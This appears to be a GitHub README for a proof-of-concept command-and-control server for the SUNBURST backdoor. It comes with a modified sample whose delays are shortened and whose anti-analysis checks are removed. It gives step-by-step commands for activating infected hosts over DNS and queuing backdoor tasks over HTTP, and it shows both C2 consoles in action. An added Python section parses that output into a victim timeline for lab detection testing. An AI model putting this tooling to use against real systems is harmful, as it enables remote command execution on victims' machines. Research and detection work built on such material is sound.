PoC Sunburst DNS and HTTP C2 server
SunburstC2Server is a proof-of-concept DNS and HTTP C2 server for the SUNBURST malware, based on public technical write-ups and reversing of the sample. With it, SUNBURST can be driven to run its backdoor commands.
Also included is a version of SUNBURST that is convenient for testing this C2 implementation. Delays are drastically shortened and anti-analysis checks are not performed. This C2 server would work with the unmodified sample, but waiting days to execute calc is no fun :)
To get a local copy up and running follow these simple steps.

Prerequisites:

- python3
- Python packages: `sudo pip install -r requirements_dns.txt` and `sudo pip install -r requirements_http.txt`
- Clone the repo: `git clone https://github.com/CreatePhotonW/SunburstC2Server.git`
- On a server (local or remote) run: `python3 sunburst_httpc2.py`
- In the HTTP C2 shell, type `auto_execute 5 calc` and hit enter
- On a server (local or remote) run (replace `127.0.0.1` with the IP address of the HTTP C2 server): `python3 sunburst_dnsc2.py --httpc2ip 127.0.0.1`
- In the DNS C2 shell, type `auto_activate` and hit enter
- Change your Windows victim's DNS server to point to the IP address of the DNS C2 server
- Build the Visual Studio solution
- Run SolarWinds.BusinessLayerHost.exe
- Wait 30-60 seconds
- SolarWinds.BusinessLayerHost.exe will reach out to the DNS C2 server and progress through the Activation phase:
```
___ __ ___ ________
________ __ ____ \_ |__ __ _________ ______/ |_ __| _/ ____ ______ ____ \_____ \
/ ___/ | \/ \ | __ \| | \_ __ \/ ___/ __\ / __ | / \ / ___// ___\ / ____/
\___ \| | / | \| \_\ \ | /| | \/\___ \ | | / /_/ || | \\___ \\ \___/ \
/____ \____/|___| /|___ /____/ |__| /____ \|__| \____ ||___| /____ \\___ /_______ \
\/ \/ \/ \/ \/ \/ \/ \/ \/
Welcome to the Sunburst DNS C2 Coordinator.
Type help or ? to list commands.
(sunburst) auto_activate
Sunbeams will begin activation when they first connect
(sunburst) (01:08:27) [*] New sunbeam found: b'4f4774e0740a7e72'
(01:08:27) [*] sunbeam preactivated (activation step 1/2): b'4f4774e0740a7e72'
(01:08:37) [*] sunbeam activated (activation step 2/2): b'4f4774e0740a7e72'
```
- SolarWinds.BusinessLayerHost.exe will reach out to the HTTP C2 server and fetch its first backdoor command:
```
___ __ /\ __ __ ________
________ __ ____ \_ |__ __ _________ ______/ |_ | |__ _/ |__/ |_______ ____ \_____ \
/ ___/ | \/ \ | __ \| | \_ __ \/ ___/ __\| | \\ __\ __\____ \_/ ___\ / ____/
\___ \| | / | \| \_\ \ | /| | \/\___ \ | | | \| | | | | |_\ \ \___/ \
/____ \____/|___| /|___ /____/ |__| /____ \|__| |___| /|__| |__| | ___/\___ /_______ \
\/ \/ \/ \/ \/ |__| \/ \/
Welcome to the Sunburst HTTP C2 Server.
Type help or ? to list commands.
(sunburst) auto_execute 5 calc
Sunbeam will process the next auto execute job in the queue on its next HTTP response
(sunburst) (01:08:39) [*] New sunbeam found: b'4f4774e0740a7e72'
```
- SolarWinds.BusinessLayerHost.exe will run a RunTask job (id=5) to spawn calc
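When this is run in a lab to validate telemetry or detection coverage, it helps to turn the two shells' output into a per-victim timeline: which sunbeam GUIDs were seen, which completed both activation steps over DNS, and which went on to contact the HTTP server. The following is an added example, not code from the SunburstC2Server project. It parses the event lines exactly as they appear in the output above (the `(HH:MM:SS) [*] message: b'<guid>'` shape, with the optional `(sunburst) ` prompt fused onto the first event line); the stage names `seen`, `preactivated`, `activated` and `http_contact`, the second, stalled sunbeam in the sample data, and the function names are all this example's own assumptions.

```python
import re
from collections import OrderedDict

# Shape of the event lines printed by both C2 shells on this page. The
# "(sunburst) " prompt is optional because the first event is printed right
# after it on the same line. Step numbers appear only on activation events.
_EVENT_RE = re.compile(
    r"^(?:\(sunburst\)\s+)?\((?P<time>\d{2}:\d{2}:\d{2})\)\s+\[\*\]\s+"
    r"(?P<event>[^:]+?)(?:\s+\(activation step (?P<step>\d)/(?P<of>\d)\))?"
    r":\s+b'(?P<guid>[0-9a-f]+)'$"
)

# Ordering of the stages a sunbeam can reach (names assumed for this example).
_RANK = {"seen": 0, "preactivated": 1, "activated": 2, "http_contact": 3}

# Sample shell output: the real lines are copied from the page; the second
# GUID is a constructed sunbeam that stalls after activation step 1.
DNS_LOG = [
    "Welcome to the Sunburst DNS C2 Coordinator.",
    "Type help or ? to list commands.",
    "(sunburst) auto_activate",
    "Sunbeams will begin activation when they first connect",
    "(sunburst) (01:08:27) [*] New sunbeam found: b'4f4774e0740a7e72'",
    "(01:08:27) [*] sunbeam preactivated (activation step 1/2): b'4f4774e0740a7e72'",
    "(01:08:37) [*] sunbeam activated (activation step 2/2): b'4f4774e0740a7e72'",
    "(01:09:02) [*] New sunbeam found: b'0123456789abcdef'",  # constructed
    "(01:09:02) [*] sunbeam preactivated (activation step 1/2): b'0123456789abcdef'",  # constructed
]
HTTP_LOG = [
    "Welcome to the Sunburst HTTP C2 Server.",
    "(sunburst) auto_execute 5 calc",
    "Sunbeam will process the next auto execute job in the queue on its next HTTP response",
    "(sunburst) (01:08:39) [*] New sunbeam found: b'4f4774e0740a7e72'",
]


def parse_events(lines, source):
    """Yield (time, source, event, guid, step) for each event line; skip banner/prompt text."""
    for line in lines:
        m = _EVENT_RE.match(line.strip())
        if not m:
            continue
        step = int(m["step"]) if m["step"] else None
        yield m["time"], source, m["event"].strip(), m["guid"], step


def build_timeline(dns_lines, http_lines):
    """Return {guid: [(time, source, event, step), ...]} sorted by time per sunbeam."""
    timeline = OrderedDict()
    for src, lines in (("dns", dns_lines), ("http", http_lines)):
        for time, source, event, guid, step in parse_events(lines, src):
            timeline.setdefault(guid, []).append((time, source, event, step))
    for events in timeline.values():
        events.sort(key=lambda e: e[0])  # stable: same-second events keep log order
    return timeline


def _stage_name(source, step):
    # Any HTTP-side event means the sunbeam finished DNS activation and moved on.
    if source == "http":
        return "http_contact"
    if step == 1:
        return "preactivated"
    if step == 2:
        return "activated"
    return "seen"


def stage_of(events):
    """Furthest stage a sunbeam reached, given its timeline entries."""
    return max((_stage_name(src, step) for _, src, _, step in events), key=_RANK.__getitem__)


def stalled_sunbeams(timeline):
    """GUIDs that were seen over DNS but never reached the HTTP C2 server."""
    return [guid for guid, events in timeline.items() if stage_of(events) != "http_contact"]


if __name__ == "__main__":
    tl = build_timeline(DNS_LOG, HTTP_LOG)
    for guid, events in tl.items():
        print(guid, stage_of(events), [(t, s, e) for t, s, e, _ in events])
    print("stalled:", stalled_sunbeams(tl))
```

Feed it the saved output of both shells and the stalled list tells you which test hosts never made it past DNS activation, which is usually the first thing to check when a network sensor or DNS logging rule is being validated against this traffic.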
See the open issues for a list of proposed features (and known issues).
Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.
- Fork the Project
- Create your Feature Branch (`git checkout -b feature/AmazingFeature`)
- Commit your Changes (`git commit -m 'Add some AmazingFeature'`)
- Push to the Branch (`git push origin feature/AmazingFeature`)
- Open a Pull Request
Distributed under the MIT License. See LICENSE for more information.
CreatePhotonW - @CreatePhotonW
Project Link: https://github.com/CreatePhotonW/SunburstC2Server